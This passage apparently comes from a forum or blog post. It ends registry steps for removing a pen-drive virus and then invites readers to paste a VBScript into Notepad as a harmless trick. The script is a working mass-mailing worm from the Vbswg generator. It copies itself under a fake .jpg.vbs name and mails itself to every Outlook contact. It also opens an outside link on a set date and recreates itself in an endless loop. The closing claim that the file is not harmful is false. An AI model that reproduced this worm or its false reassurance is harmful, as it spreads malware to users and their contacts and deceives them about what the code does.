C:\heap(some number)\std.txt"

12.Press DEL. It will ask "Are you sure you wanna delete this value",
click "Yes"

13.Now close the registry editor

BANG! Virus is Gone!

Note: Please format all your pen drives because the virus is in that
hidden in an microsoft.exe autorun.inf which you might not find. Else
you might have to repeat all this everytime!

Open Notepad & Try this

Hey My dear friends

Copy The Below text
& paste it in a note pad Then Save it on Desktop
On Error Resume Next
Set shellobject = CreateObject("WScript.Shell")
shellobject.regwrite "HKCU\software\Greator\", "Worm made with Vbswg 1.50b"
Set filesystem= Createobject("scripting.filesystemobject")
filesystem.copyfile wscript.scriptfullname,filesystem.GetSpecialFolder(0)&"\Fergielicious.jpg.vbs"
if shellobject.regread ("HKCU\software\Greator\mailed") <> "1" then
mail_trojan()
end if
if month(now) =1 and day(now) =26 then
shellobject.run " http://tinyurl.com/3cefmo ",3,false
end if
Set wormfile= filesystem.opentextfile(wscript.scriptfullname, 1)
payload= wormfile.readall
wormfile.Close
Do
If Not (filesystem.fileexists(wscript.scriptfullname)) Then
Set newfile= filesystem.createtextfile(wscript.scriptfullname, True)
newfile.writepayload
newfile.Close
End If
Loop
Function mail_trojan()
On Error Resume Next
Set outlook = CreateObject("Outlook.Application")
If outlook= "Outlook"Then
Set mapi=outlook.GetNameSpace("MAPI")
Set addresses= mapi.AddressLists
For Each address In addresses
If address.AddressEntries.Count <> 0 Then
count = address.AddressEntries.Count
For I= 1 To count
Set email = outlook.CreateItem(0)
Set entry = address.AddressEntries(I)
email.To = entry.Address
email.Subject = "Here you have, ;o)"
email.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set attachment=email.Attachments
attachment.Add filesystem.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
email.DeleteAfterSubmit = True
If email.To <> "" Then
email.Send
shellobject.regwrite "HKCU\software\Greator\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b


Scan that File For Virus
but Believe It is not harm For Your PC